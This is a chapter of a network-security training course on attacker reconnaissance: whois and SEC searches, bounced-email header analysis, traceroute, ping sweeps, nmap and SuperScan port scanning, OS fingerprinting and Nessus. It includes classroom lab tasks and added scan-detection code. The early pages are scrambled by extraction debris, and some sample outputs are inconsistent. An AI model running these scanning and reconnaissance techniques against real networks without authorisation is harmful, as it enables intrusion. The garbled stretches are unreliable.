8K Explore and discuss social engineering techniques.
Given a simple network scenario, you will explore and discuss social engineering techniques used to gather information about and access to a target network.

8L Analyze an example of social engineering.
Given a scenario of social engineering, you will identify the methods used and information gained by an attacker.

8M Investigate potential ways that unauthorized administrator access can be achieved.
You will see how basic programming skills can be used to give a user account administrative privileges on a Windows 2000 network; how physical access to the server, along with another OS and a little advanced knowledge of how Windows works, can be used to compromise an unpatched Windows NT Server; and how a Linux machine can be compromised by booting to single-user mode.

8N Hide the evidence from an attack.
Given a simple network scenario, you will determine ways to hide the evidence of an attack, such as by clearing log files in both Windows and Linux operating systems.

8O Perform a Denial of Service on a target host.
Given a simple network scenario, you will use Denial of Service tools to take a target computer offline.

Topic 8A
Network Reconnaissance

Finding a Target

Ed
T DU PL IC

Finding the target network is a process that requires extremes, such as from having a very clever and creative mind to simply driving down the street. If the hacker is simply hacking for fun, any business that looks interesting is a good target. If the hacker is trying to challenge himself, then a bit more work is required than a simple drive-by, looking for the neatest looking building.

These are some of the questions hackers must answer before they go to work: Who/What am I going to hack? Why am I going to hack?

Without knowing the answers to these questions ahead of time, the hacker is doomed to failure.

st

In

If there is no useful data in the newsgroups on a given day, another valuable resource for the hacker is to search the SEC (Securities and Exchange Commission). The SEC has records on all recent business mergers and acquisitions. Searching through the press releases of various business mergers and modications may be all that a hacker needs to identify a potential target.

DO

For many hackers, newsgroup browsing is like shing. Perhaps you need to wade through hundreds of messages, but if you wait long enough, you will get a bite. Be wary of posting too much information or real IP addresses in a newsgroup, even if it is a strongly moderated group.

NO

Assuming that the basic questions are answered, the hacker begins the reconnaissance. One of the primary areas to go for potential targets is to a newsgroup. New network administrators will practically give away their network contents in a newsgroup to someone who seems helpful.

ru ct

What am I looking for if access is gained?

or

AT
Common newsgroups that hackers may browse are any groups related to administration, security, and protocols.

There are tools available to the potential hacker, although the best tool is the brain. Being able to read the newspapers, hardcopy or online, is how many hackers nd their targets. But what are they looking for, or what are they trying to nd?

Lesson 8: Attack Techniques

E
483

iti

For example, what network is the hacker even trying to get into? How did they choose this network? This is where the work can come in. For many hackers, the actual act of network penetration is not the difficult task. It is the task of nding a network to target in the rst place.

on

One of the rst things to realize is that hacking (cracking, phreaking, and so forth, will all be referred to as hacking in this lesson) is generally a tedious process. It is, in reality, quite unlike the movie visualizations of hacking. It isnt simply typing in a string of a few numbers and magically gaining access to a network.

phreaking: The art and science of cracking the phone network.

penetration: The successful unauthorized access to an automated system.

Network Reconnaissance

or
DO NO

back door: A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls.

ru ct

If a potential company has been found via an SEC search or by other means, the next step is to nd out more information about the company. The SEC ling is usually quite comprehensive as far as the amount of data it reveals; however, there are other places to go to gain further knowledge.

In

484

Hardening The Infrastructure (SCP)

st

Who is the Target?

The next place to go to learn about a company is their Web site registration information. This information is easily available, and in some instances contains incredible amounts of data about the company. Common registration searches are located at the following Web sites: General searches: www.internic.com/alpha.html. The U.S. military directories: http://whois.nic.mil. The U.S. government directories:http://whois.nic.gov.

DU

It is during this loose period that the hacker may sneak in an open hole in the network. The hacker will attack the smaller company in hopes that the security is lowered, which it usually is, compared to the bigger company. By nding a weak point in the smaller company and exploiting it before the merger is complete, the hacker can gain a back door entry into the larger company.

PL

IC

The usefulness of this information is varied. But in many situations, when a large company takes over or buys out a smaller company, one of the rst issues is connectivity between companies. Much of the time, security is loosened a bit to ensure that all employees in every location can communicate.

AT

Figure 8-1: The SEC Web site.

Ed

iti

on

ru ct

st

In

DO

NO

T
Lesson 8: Attack Techniques


A search through one of these directories can reveal information such as the physical address of the company, the name of the person who owns the DNS domain name, the name of the network administrator, the company phone number, the company fax number, the email addresses of administrators, the DNS servers that the company (or at least the Web site) uses, the ISP that the company uses, other domain names the company owns, the IP address range assigned to the target company, and more. See Figure 8-3 for an example of a Whois output.

Figure 8-2: An example of a search lookup tool.

486 Hardening The Infrastructure (SCP)

Information learned from the Whois lookup includes:
Registrar: This defines who the actual person or company is that owns the domain name.
Mailing Addresses: This defines the mailing and/or the physical address of the business or person who owns the name.
Contact Names: This defines the person(s) responsible for billing and/or administrative functions of the domain name. At times, this will also list the actual email addresses and phone numbers of the contact names.
Record Updates: This defines the last time the record was updated, and when it expires.
Network Addresses: This defines the IP addresses associated with the domain name.
DNS Server Addresses: This defines the DNS servers responsible for the domain name.

Figure 8-3: The output results from running a Whois lookup on the Web site NetworkSolutions.com, one of the most popular registration sites on the Internet.

One of the above items that needs to be addressed is the other domain names a company might own. Often, the smaller satellite sites have looser security implementations, and may be the starting point for an attack. If the company owns many sites and they are all active, they all need to be secured, not just the primary one.

Studying the Message Source

A follow-up would be to send an email to a made-up address, something that will be returned as an unknown recipient. Then, the message source can be studied to learn the details about the email servers used in the target network. See Figure 8-4 for an example of reading the message source of an email message.

Figure 8-4: An example of the message source of an email message.

In Figure 8-4, you can see that a hacker can learn the names of the email servers inside the potential target network, in this case mailserver.securitycertified.net. The hacker learns that the private IP address being used is 192.168.23.45. This may indicate the address range used inside the company. Other message sources can reveal public IP addresses, as well as the names (and even the naming schemes) of the company's routers. All of this information can be learned via a simple returned email message.

So, in a matter of minutes, a hacker using registration searches and a bogus email can learn quite a bit of information about the potential target. Try this for your own company this coming weekend, and see what you can learn. You may be able to learn details you did not know, even though you work there!

After this initial network reconnaissance has been completed and a potential target network has been identified, the hacker must next learn all of the details possible about this target network.

Topic 8B
Mapping the Network

With the potential target network identified, the next phase a hacker needs to complete is to map the network. What this means is to identify the topology of the network and to identify as many of the nodes as possible by their IP addresses and their position in the network.

There are many tools available to the network security professional to manage their networks. Some of these tools are free, while others have costs associated with them. The very same tools that are used by the administrators and security professionals are used by hackers in trying to map out potential target networks.

network security: Protection of networks and their services from unauthorized modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.

Mapping Tools

The standard free tool that most hackers have to use for network mapping is the traceroute utility. Traceroute is included in most versions of UNIX, Linux, Windows NT, and Windows 2000. Traceroute is a simple and highly effective tool for defining the path that packets are taking across the network from node to node. Written to use the Time To Live (TTL) field of an IP packet, traceroute elicits ICMP TIME-EXCEEDED messages from each node. For each router (or node) the packet passes through, the TTL is lowered by one. This has the net effect of allowing the TTL field in the packet to become the hop count.

Using Traceroute

Using traceroute allows for identification of the routers on a given network and provides information as to their filtering properties. It is not uncommon for firewalls to block traceroute from passing through. Knowing this information, a hacker is able to make an educated guess as to which IP addresses are firewalls and which are routers.

The UNIX (and Linux) implementations of traceroute use UDP (User Datagram Protocol) packets by default, but they do have the option to use ICMP (Internet Control Message Protocol) packets via the -I switch. Windows NT (and 2000) use ICMP echo request packets by default.

The traceroute program is spelled tracert in Windows operating systems to follow the 8.3 naming convention.

Using tracert on Windows

The following is an example of a trace completed on a Windows 2000 computer:

C:\>tracert 10.0.10.100
Tracing route to 10.0.10.100 over a maximum of 30 hops:
  1   <10ms   <10ms   <10ms   192.168.15.1
  2    70ms    81ms    71ms   isp1.net [172.16.31.1]
  3    54ms    37ms    48ms   isp2.net [169.254.48.100]
  4    61ms    73ms    65ms   isp3.net [10.0.10.57]
  5    27ms    29ms    25ms   10.0.10.100

TASK 8B-1
Using Windows Tracing Tools

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open a command prompt, and enter tracert 172.17.10.1 to trace the route to the specified IP address.
2. View the results, paying particular attention to:
   Time between hops
   Addresses resolved
   Overall number of hops
3. Close the Command Prompt.

Using traceroute on Linux

Linux also has tracing tools included. The executable is named traceroute on Linux operating systems. The following is an example of Linux tracing:

[lnx1]$ traceroute 10.0.10.100
traceroute (10.0.10.100), 30 hops max, 40 byte packets
 1  dg1 (192.168.15.1)          7.933ms   8.719ms   8.211ms
 2  isp1 (172.16.31.1)         68.762ms  79.204ms  72.659ms
 3  isp2 (169.254.48.100)      56.843ms  37.026ms  47.242ms
 4  isp3 (10.0.10.57)          61.845ms  73.407ms  64.921ms
 5  10.0.10.100 (10.0.10.100)  27.721ms  29.285ms  26.387ms

Using Graphical Tracing Tools

In addition to the tools that ship with both Windows and Linux operating systems, there are many commercially available tools for tracing. Two of these tools can be tried as downloadable evaluation copies and purchased later if desired:
VisualRoute, found at www.visualroute.com.
NeoTrace, found at www.neotrace.com.

Each of these tools provides for graphical mapping of the data path and much more. In addition to providing an actual image of the route, these tools can perform functions such as Whois lookups, the physical location of each hop, time between hops, and more.

Figure 8-5: An example of using VisualRoute.

Another tool, in the same category as VisualRoute, is NeoTrace. In a slightly different visual format, these two tools are designed to show the network on-screen during the trace.

A useful, or at least interesting, option available when you are using NeoTrace, if you have an Internet connection, is to show either a map or a satellite image of the location you are tracing to (or any of the nodes in between).

Figure 8-6: An example of using NeoTrace.

TASK 8B-2
Using VisualRoute

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

Provide students with the location of the VisualRoute installation files.

1. Copy the VisualRoute installation program from the location provided by your instructor to your desktop.
2. Double-click the installation program, and follow the prompts to install VisualRoute in the default location.
3. Start the VisualRoute program. It should be found in the Start menu, under Programs. Select English as the language, if necessary.
4. In the Enter Host/URL text box, enter the IP address of another computer in your class, such as 172.17.10.1. Select the link and view the results, paying particular attention to the following:
   Time between hops
   Addresses resolved
   Overall number of hops
5. Close VisualRoute and any other open windows.


Topic 8C
Sweeping the Network

Once the basic mapping of the target network has been completed with the given tools such as NeoTrace Pro, VisualRoute, and traceroute, the hacker will need to get more details about the target nodes that are in the network. This is where network scanning comes into play. By using a network scanner of a given type, the hacker can start to identify the potential target machines inside the network. The potential target has been identified; now it is time to start to look for a potential entry point.

The different options for learning about a network include:
Network ping sweeps
ICMP queries
Automated discovery tools
Operating system detection

Ping Sweeping

Network ping sweeps are used to determine which of the remote hosts on a given segment are active. The concept is somewhat simple, yet effective:
1. Ping a given range of hosts.
2. The hosts that respond are determined to be the ones that are active.
3. The hosts that do not respond are assumed not active.
4. By looking at the list of responding hosts, the hacker can determine what the active range of IP addresses is.

The default operation of ping is to issue an ICMP ECHO request packet to the remote host. The remote host would then return an ICMP ECHO_REPLY packet, which indicates nothing more than that the remote node is on and responding. There are ping sweep utilities made so the hacker does not have to enter each possible address manually. Take care when defining the IP addresses for a ping sweep. If the broadcast address for a segment is included in the sweep, a denial of service may result. Also, try not to perform such scanning while on the Internet; someone may complain, and your ISP may cut you off.

The ping sweep method is effective, but it is worth noting that an administrator can have hosts configured to not respond to different types of ping, as you will see later. If the ping sweep is not producing the results the hacker is looking for, he or she will simply modify the properties of the sweep to try different attempts.

Linux Ping Sweeping with the fping/gping Tool

The common ping sweep for UNIX/Linux is called fping/gping. Gping generates the list of potential addresses and submits that information to fping. Fping then performs the ping function and sends the output to a text-readable file that identifies active hosts.

A major benefit in the operation of fping/gping is the speed at which the commands complete. In a traditional sense, using ping means send one packet to the remote host, wait for the response, and then proceed to the next host. As you can see, following this method will take quite some time if there are hundreds or thousands of nodes to ping. Fping/gping is able to speed up this process by submitting a mass request out to the network in parallel. This rather simple approach is quite effective, as shown here:

[Server] $ gping 192 168 1 1 254 | fping -a
192.168.1.207 is alive
192.168.1.7 is alive
192.168.1.48 is alive
192.168.4.52 is alive
...

Linux Ping Sweeping with the nmap Tool

One of the most used and most respected network tools is nmap. Written by an individual named Fyodor, this is one tool that all security professionals are comfortable with. In this section, we will investigate only one area of nmap, but this is one tool you will see several times. In the following example, nmap is being used to locate active hosts:

[Server] $ nmap -sP 192.168.1.0/254
Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap/)
Host (192.168.1.1) appears to be up.
Host (192.168.1.7) appears to be up.
Host (192.168.1.48) appears to be up.
Host (192.168.4.52) appears to be up.
...

Windows Ping Sweepers

Windows users are not left behind when it comes to ping sweep utilities. These function via a command prompt or a GUI and present the results in the responding window. They work on the same premise, by filling in a starting and ending address, then telling the program to sweep. Examples of common Windows ping sweepers are Pinger, SuperScan, and Ping Sweep. (Ping Sweep is part of a professional set of networking tools from SolarWinds, Solarwinds.net.)

Pinger

Pinger is a fast, efficient, and lightweight Windows tool for network ping sweeps. After you define the starting and ending IP addresses, followed by options such as number of passes and name resolution, Pinger is able to complete its task quickly.

Figure 8-7: An example of Pinger before IP addresses are defined.

SuperScan

SuperScan is another tool like nmap that has many more functions than simply identifying active hosts. We will return to SuperScan later in the course, but for now will focus on the active host identification option. See Figure 8-8 for the SuperScan default window.

Figure 8-8: SuperScan in default mode, before a scan begins.

TASK 8C-1
Using SuperScan

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

Provide students with the location of the SuperScan installation file.

1. Copy the SuperScan installation program from the location provided by your instructor to the desktop. Then double-click it and follow the prompts to install SuperScan in the default location. The program automatically starts when the installation is complete.
2. In the IP Start and Stop text boxes at the left of the screen, enter the starting IP address of your portion of the class network and the ending IP address of the network. For instance, if you are on the LEFT side of the room, you might enter 172.16.0.1 through 172.16.10.6.
3. Under Scan Type, select Ping Only.
4. Verify that Resolve Hostnames is checked.
5. Verify that Show Host Responses is checked, even though it is grayed out.
6. Click Start to begin the scan. Because SuperScan pings every possible address, the scan takes a while to complete.
7. Observe the responses from the other hosts in the room as they are displayed in the GUI.
8. If possible, try to observe the activity on the hubs or switches in the class during this activity.
9. Close SuperScan.

Topic 8D
Scanning the Network

Now that you've identified potential target hosts to hack, you need to find out how to get into these targets. One way to do this is to identify open ports on the target hosts.

Port Scanning

Port scanning is also the primary method used to identify potential targets in the event that an administrator has disabled ICMP at the firewall. Even if a host does not respond to a ping request, that node may be active, and the port scan can identify this host in hiding. Port scanners have several different methods of operation. Based on the input type, the scanners may use these different methods to avoid detection. A few of the options they can run as are:

TCP connect scan. The TCP connect scan makes a full three-way-handshake level connection to the remote host. Since a full connection is created, this type of scan is easy to detect.

TCP SYN scan. The TCP SYN scan makes only a half-open connection. This scan steps part of the way through the three-way handshake, only long enough to receive the reply to its SYN. Once that reply arrives, the scanner can assume the port is open and does not complete the full connection. The TCP SYN scan is harder to detect than the full connect scan.

TCP ACK scan. The TCP ACK scan works on a similar premise as the SYN scan in that it does not establish a full connection with the target host. The ACK scan can tell the hacker if the firewall is only accepting full connections, or if it is performing more detailed controlled filtering.

Three other scan types are based on the principles of RFC 793, which states how the target system should respond with RST messages:

TCP FIN scan. The TCP FIN scan sends a FIN packet to the given port, and the remote node will respond with a RST for closed ports. This scan works best on UNIX TCP/IP stack implementations.

TCP Null scan. The TCP Null scan sets all flags to off, and the remote node responds with a RST message for all closed ports.

TCP Xmas Tree scan. The TCP Xmas Tree scan sends a packet with the PUSH, FIN, and URG flags set to the target port, and the remote node will respond with a RST for all closed ports.

Most Intrusion Detection Systems will detect port scans while they are scanning.

Port scanning an entire network segment can consume high amounts of bandwidth and can be very time consuming.

The netstat Tool

Although there are many tools for scanning, it is important not to forget the built-in utilities offered in operating systems. One example is netstat in Windows. Figure 8-9 shows the possible switches that can be used with netstat. Netstat is a powerful tool, but has a limitation in that it does not identify the program or service that is listening on a port, only that the port is open.

Pay close attention to a few of the more often used switches, such as:
-a, which shows all connections and listening ports.
-e, which displays statistics such as Unicast packets sent and received.
-s, which defines statistics on a per-protocol basis.

Figure 8-9: Netstat switch options.

Service Identification

Although learning which nodes on the target network are active is important, and using network scanning and sweeping will divulge this information, the hacker is concerned with learning even finer levels of detail.

The hacker wants to know what services are running on the potential targets. Knowing the number of services that are active, and what they are designed to do, will make the hacker's entry attempts much more likely to succeed.

Scanning Tools

The tools you used in the previous topics will be used to their next level here. Most of the same tools we have already looked at, such as nmap and SuperScan, can also be used to define the active ports. Two other well-known port scanners are Strobe and Netcat. Strobe is an efficient port scanner that is limited to scanning TCP ports, so if UDP ports are the target, a different tool must be selected. Additionally, Strobe uses the TCP full connect method, meaning that Intrusion Detection Systems will pick it up quickly. See Figure 8-10 for an example of Strobe in operation.

Figure 8-10: Strobe's available options.

A utility we have seen before, nmap, also has great port-scanning and service-definition options. It has the built-in ability to scan both TCP and UDP ports, as seen in Figure 8-11. There are too many nmap switches to list here, so once it is running, you will want to be sure to check the associated help file. A few of the significant switches are:
-sT: TCP connect() port scan (default)
-sS: TCP SYN stealth port scan (best all-around TCP scan)
-sU: UDP port scan
-sP: ping scan (find any reachable machine)
-sF, -sX, -sN: Stealth FIN, Xmas, or Null scan (experts only)

Figure 8-11: Using nmap to port-scan a network host.

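Detection logic for the sweep and scan behaviour described in Topic 8C and under Port Scanning above, as an added example that is not part of the course material or of any tool named here. It runs over a constructed packet list and reports, per source, ICMP sweeps, half-open SYN probes (SYN answered with SYN/ACK and then torn down with RST instead of ACK), and the Null, Xmas Tree and FIN probes that a normal session never sends.

```python
"""Detect ping sweeps and port scans in a packet log.

Added example, not part of the course or of nmap, fping or SuperScan.
It applies the behaviour described in Topics 8C and 8D to a constructed
packet list: one source sending ICMP echo to many hosts (a sweep), SYN
probes answered with SYN/ACK and then torn down with RST instead of ACK
(half-open SYN scan), and the RFC 793 flag tricks (FIN, Null, Xmas).
"""
from collections import defaultdict

# Record layout: (src, dst, proto, service_port, flags).
# service_port is the server-side port for both directions of a TCP
# exchange; flags is a set of TCP flag names (empty for ICMP).
# All addresses and packets below are constructed for this example.
SCANNER, SERVER, CLIENT = "10.9.9.9", "192.168.1.7", "192.168.1.50"
PACKETS = [
    # ICMP echo requests from one source to six hosts: a ping sweep.
    *[(SCANNER, f"192.168.1.{i}", "icmp", None, set()) for i in range(1, 7)],
    # Half-open SYN scan of ports 22 and 80: SYN, SYN/ACK, then RST.
    (SCANNER, SERVER, "tcp", 22, {"SYN"}),
    (SERVER, SCANNER, "tcp", 22, {"SYN", "ACK"}),
    (SCANNER, SERVER, "tcp", 22, {"RST"}),
    (SCANNER, SERVER, "tcp", 80, {"SYN"}),
    (SERVER, SCANNER, "tcp", 80, {"SYN", "ACK"}),
    (SCANNER, SERVER, "tcp", 80, {"RST"}),
    # Null, Xmas tree and FIN probes against three more ports.
    (SCANNER, SERVER, "tcp", 139, set()),
    (SCANNER, SERVER, "tcp", 445, {"PSH", "FIN", "URG"}),
    (SCANNER, SERVER, "tcp", 23, {"FIN"}),
    # A legitimate client completing the three-way handshake.
    (CLIENT, SERVER, "tcp", 80, {"SYN"}),
    (SERVER, CLIENT, "tcp", 80, {"SYN", "ACK"}),
    (CLIENT, SERVER, "tcp", 80, {"ACK"}),
]

# Flag combinations that only a scanner sends as the first packet.
PROBE_KINDS = {
    frozenset(): "null",
    frozenset({"FIN"}): "fin",
    frozenset({"PSH", "FIN", "URG"}): "xmas",
}


def classify_probe(flags):
    """Return 'null', 'fin' or 'xmas' for a scan probe, else None."""
    return PROBE_KINDS.get(frozenset(flags))


def find_ping_sweeps(packets, min_hosts=5):
    """Sources that sent ICMP echo to at least min_hosts distinct hosts."""
    targets = defaultdict(set)
    for src, dst, proto, _port, _flags in packets:
        if proto == "icmp":
            targets[src].add(dst)
    return {s: len(h) for s, h in targets.items() if len(h) >= min_hosts}


def find_half_open(packets):
    """(client, server, port) triples where the client answered SYN/ACK
    with RST instead of ACK: the signature of a SYN (half-open) scan."""
    state, half_open = {}, set()
    for src, dst, proto, port, flags in packets:
        if proto != "tcp":
            continue
        f = frozenset(flags)
        key, reverse = (src, dst, port), (dst, src, port)
        if f == {"SYN"}:
            state[key] = "syn"
        elif f == {"SYN", "ACK"} and state.get(reverse) == "syn":
            state[reverse] = "synack"
        elif f == {"ACK"} and state.get(key) == "synack":
            state[key] = "established"
        elif f == {"RST"} and state.get(key) == "synack":
            state[key] = "half-open"
            half_open.add(key)
    return half_open


def find_port_scans(packets, min_ports=3):
    """Per source, the ports probed by each technique, for sources that
    touched at least min_ports distinct ports with any scan technique."""
    probes = defaultdict(lambda: defaultdict(set))
    for client, _server, port in find_half_open(packets):
        probes[client]["syn"].add(port)
    for src, _dst, proto, port, flags in packets:
        kind = classify_probe(flags) if proto == "tcp" else None
        if kind:
            probes[src][kind].add(port)
    report = {}
    for src, by_kind in probes.items():
        touched = set().union(*by_kind.values())
        if len(touched) >= min_ports:
            report[src] = {k: sorted(v) for k, v in by_kind.items()}
    return report


if __name__ == "__main__":
    print("ping sweeps:", find_ping_sweeps(PACKETS))
    print("port scans:", find_port_scans(PACKETS))
```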

TASK 8D-1
Using nmap

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Log in to Linux as root.
2. Open a Terminal Window.
3. Enter nmap -sS x.x.x.x, where x.x.x.x is any IP address in the classroom network.
4. View the results, noting the open ports and their associated services.
5. Close all open windows.

Windows Port Scanners

Although we have just used Linux tools for the last exercise, Windows users are not without port scanning tools. From professional tools such as NetScan Tools Pro 2001, to free programs like SuperScan and WinScan, as well as Nmapnt (a version of nmap for NT), the whole spectrum of network scanning is covered.

NetScan Tools Pro 2001 is one of the most comprehensive administrative tools for understanding a network. Available options include ping sweeps, port scanning, traceroute, Whois lookups, and more. See Figure 8-12 for an example of the options in NetScan Tools Pro.

Figure 8-12: The options available in NetScan Tools Pro 2001.

SuperScan, which was used in earlier exercises, also has more options than simple ping sweeping. With SuperScan, the options are presented to port-scan by a given range of numbers, all port numbers, or specific lists. It is the specific-list feature that comes in handy. There are predesigned port lists for scanning, and lists can be customized. Figure 8-13 and Figure 8-14 show SuperScan in use.

Figure 8-13: An example of SuperScan during a scan. Nodes with plus signs next to their IP addresses have open ports. Figure 8-14 shows SuperScan after the scan is complete.

Figure 8-14: An example of SuperScan after a scan has been completed. Notice the node that has been expanded to reveal the open ports.

TASK 8D-2
Using SuperScan

Setup: You are logged in to Linux as root.

1. Log on to Windows 2000 as the renamed Administrator account.
2. Start the SuperScan program.
3. In the IP Start and Stop text boxes, enter the starting and ending IP addresses of your portion of the classroom network.
4. Under Scan Type, select All Ports From.
5. Set Port Values from 1 to 1024.
6. Leave Show Host Responses checked.
7. Start the scan.
8. Observe the responses from the other hosts in the room as they are displayed in the GUI. If possible, try also to observe the activity on the hubs or switches in the class during this activity.
9. When the scan is complete, click the Expand All button in the lower-right area of the screen, to see what ports are open on the other computers in the classroom.
10. Compare these results with the ones you saw from using nmap. If you need a reminder for the nmap results, see Figure 8-11.
11. Close SuperScan.

Identifying the Operating System and OS Version

Once the hacker has an idea of the available targets, he or she next needs to try to identify what operating system is running and, if possible, the version of the operating system. By learning all of the possible details of a potential target, the hacker knows his or her chances of a successful connection increase drastically. There are several ways a hacker can try to identify the operating systems running on a network. He or she can try banner grabbing, active stack fingerprinting, and passive stack fingerprinting.

Banner grabbing is the oldest and most simple technique for identifying the operating system. A potential hacker tries to telnet to a given target host. That target may prompt for a user name and password. Many times, in the banner message for the telnet session, the system administrator has left clues to, or even has labeled, the identity of the device the hacker is connecting to. For example, Figure 8-15 shows the banner screen for a telnet session.

Figure 8-15: An example of a banner posted as a warning on a router.

A warning message is needed, and required by most security policies; however, giving out too much information is not needed or desirable. There is no need to make a hacker's job easier. Banner grabbing is one of the simplest methods of learning information.

In addition to banner grabbing from a telnet session, another common technique that hackers can use is to identify the operating system by reading the source code of Web sites. Some Webmasters put relevant information in the comment fields of their Web sites. This information can include what was used to create the Web site, such as Microsoft FrontPage. If FrontPage created the Web site, the hacker can be relatively sure that the site is hosted on a Microsoft box, most likely Windows NT. Figure 8-16 shows an example of a Web source.

Figure 8-16: Viewing the source code of a Web site.

Banner grabbing, in general, is no longer a method that hackers can rely on with any degree of certainty. Most administrators are aware of banner grabbing and no longer have clues to the OS listed in cleartext that anyone can see. In fact, a clever administrator will put in banners from other OSs just to confuse a would-be banner grabber. These are all superficial issues, however, as there are still other instances of too much information easily available, so administrators should double-check their systems.

Stack Identification

Once the hacker has checked to see if banner grabbing offers any further details, and finds out that there are none, he or she might move to stack identification. Stack identification is the process of examining the TCP/IP protocol stack that is running.

Although TCP/IP is an industry standard, most vendors have slightly different implementations of TCP running on their systems. By being aware of this, a hacker can look at the way TCP/IP operates on a potential target, and by analyzing this data, make an educated guess at what the OS is.

The specific details of what the hacker will look for vary from person to person, although there are some very common points that most hackers use. The hacker picks up these small variations of TCP/IP by performing either passive or active fingerprinting.

Active stack fingerprinting is when the hacker has a TCP/IP packet from the potential target and dissects the packet looking for these points. The common fingerprint points that hackers look at are the following:

FIN Probe: The FIN probe takes advantage of the way TCP/IP responds to an open port probe. In many implementations, there will be no response from the probed port. One exception to this is the way Windows NT responds. Windows NT responds with a FIN/ACK response.

TCP Initial Window Size: In the TCP/IP lesson, we discussed the concept of windowing. Some operating systems use unique values for the initial window size, and this can be used to help identify the operating system.

Don't Fragment Bit: Some TCP/IP stacks are set to define whether or not the Don't Fragment bit is turned on or off.

ICMP Message Quoting: When an error message is quoted by ICMP, some implementations send the IP header with an additional 8 bytes. However, Solaris and Linux will send more. ICMP Message Quoting does not require any listening ports.

Some tools, such as nmap, will try to identify the OS via active stack fingerprinting for the hacker. Figure 8-17 shows an example of nmap active stack fingerprinting.

Figure 8-17: An example of nmap performing active stack OS fingerprinting. Notice the Remote Operating System guess.

Figure 8-18 shows another example of nmap active stack fingerprinting.

Figure 8-18: Another example of nmap performing active stack OS fingerprinting. Notice the Remote Operating System guess.

If the hacker does not choose to use active stack fingerprinting, or wishes to be stealthier, he or she can also try passive stack fingerprinting. Passive stack fingerprinting uses many of the same checks to determine the type of operating system in use. The process is slightly different in the fact that the hacker is not initiating a connection with the potential target. Since there is no established connection, the chances of detection are much lower. However, passive stack fingerprinting requires access to the medium in order to sniff the packets for identification.

The common methods of passive stack fingerprinting include the Window Size and DF (Don't Fragment) bit, as mentioned above. Another common passive stack fingerprinting option is to check the TTL (Time To Live). Some operating systems use a unique value for this setting.

Using nmap to Identify the OS

We will now look at another useful feature of nmap, which, incidentally, stands for Network MAPper, and is a favored security tool designed for network exploration or security auditing. It is available at www.insecure.org. It can perform fast scans of entire networks and scans individual hosts just as well. It uses raw IP packets to determine which hosts are active on the target network and what ports they have open and listening. It is also able to try and identify the operating system running by matching TCP/IP signatures. There are both command-line and GUI versions, and a version of nmap for NT is also available from www.eEye.com.

security audit: A search through a computer system for security problems and vulnerabilities.

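As an added illustration of the passive checks listed above (TTL, initial window size, and the DF bit), the following is example code written for this edition, not nmap's or any other tool's code. The SIGNATURES table and the sniffed packets are constructed for the example; only the method, and the 64/128/255 default TTLs it rounds up to, are what the passage describes.

```python
"""Passive stack fingerprinting from TTL, window size and DF bit.

Added example, not code from the course or from nmap. The method is the
one described above: recover the initial TTL by rounding the observed
TTL up to the nearest common default (32, 64, 128 or 255), treat the
difference as hop distance, and use window size and DF as extra clues.
The SIGNATURES table is constructed for illustration, not a real
fingerprint database.
"""
from dataclasses import dataclass

INITIAL_TTLS = (32, 64, 128, 255)

# (initial TTL, initial window size, DF set) -> label. Constructed.
SIGNATURES = {
    (64, 5840, True): "linux-2.4-like",
    (128, 16384, True): "windows-2000-like",
    (255, 8760, True): "solaris-like",
}


@dataclass(frozen=True)
class SynPacket:
    """Fields a sniffer would pull from the first SYN of a session."""
    src: str
    ttl: int
    window: int
    df: bool


def guess_initial_ttl(ttl):
    """Smallest common default TTL that is >= the observed value."""
    for candidate in INITIAL_TTLS:
        if ttl <= candidate:
            return candidate
    raise ValueError(f"impossible TTL {ttl}")


def fingerprint(pkt):
    """Guess the stack behind one SYN; never claims more than the data
    supports, falling back to the TTL family alone."""
    init = guess_initial_ttl(pkt.ttl)
    label = SIGNATURES.get((init, pkt.window, pkt.df))
    return {
        "src": pkt.src,
        "guess": label or f"unknown (initial TTL {init})",
        "initial_ttl": init,
        "hops": init - pkt.ttl,
        "matched": label is not None,
    }


def exposure_report(packets):
    """Defender's view: which sniffed hosts reveal an OS guess to a
    passive observer, keyed by source address (first SYN seen wins)."""
    seen = {}
    for pkt in packets:
        fp = fingerprint(pkt)
        seen.setdefault(fp["src"], fp)
    return {src: fp["guess"] for src, fp in seen.items() if fp["matched"]}


# Constructed sample of sniffed SYNs (addresses reuse ones from the
# course's own output listings; the TTL/window/DF values are made up).
SAMPLE_SYNS = [
    SynPacket("192.168.23.45", 120, 16384, True),  # 8 hops from a 128 TTL
    SynPacket("192.168.1.7", 58, 5840, True),      # 6 hops from a 64 TTL
    SynPacket("192.168.1.48", 250, 65535, False),  # no signature match
]

if __name__ == "__main__":
    for p in SAMPLE_SYNS:
        print(fingerprint(p))
    print(exposure_report(SAMPLE_SYNS))
```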

TASK 8D-3
Using nmap to Identify an Operating System

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Log in to Linux as root.
2. Open a Terminal Window, and enter nmap -sS x.x.x.x -O, where x.x.x.x is the IP address you want to scan and O is the letter O, not the number zero.
3. View the results, noting the open ports, their associated services, and the OS guess at the bottom of the report.

Using the nmap Front End

As some people don't seem to like using a command line, we will now see that there is a GUI version of nmap called NmapFE.

Figure 8-19: The graphical version of nmap.

TASK 8D-4
Using nmap Front End

1. In the Terminal Window, enter nmapfe to run the Nmap Front End.
2. Use the GUI to scan another host in the class, finding open ports and identifying the operating system of the target.
3. Close NmapFE.
Using Nessus to Perform a Scan

To understand the security holes that can be exploited on a system, a full security scan should be used. Nessus is a tool that provides this option. It can perform different types of port scans, and it can report on security holes found in the network.

In this section, screens of Nessus 1.2.7 are shown, even though it is an older version of the software. Visit www.nessus.org to download the latest stable version.

As of the time of this writing, version 2.0.3 was the most current stable version of the tool.

Setup: You are logged on to Linux as root, and a Terminal Window is open.

Figure 8-20: The available Nmap scan options in Nessus 1.2.7.

508 Hardening The Infrastructure (SCP)

The security report will list the following items: Security risks by rank (High, Med, Low, and Serious). Most dangerous services found on the network. Services that are most available on the network. Operating systems found on the network. Further details of each host scanned.

In

st

The section with further details on each host is where the vulnerabilities are dened. An example of a detailed report is shown here:

DU

Nessus deals with found exploits a bit differently than other security scanners do. It has the ability to actually try and locate buffer overows or even to crash servers. Once it has located vulnerabilities, a report is generated that shows what was found.

PL

IC

AT

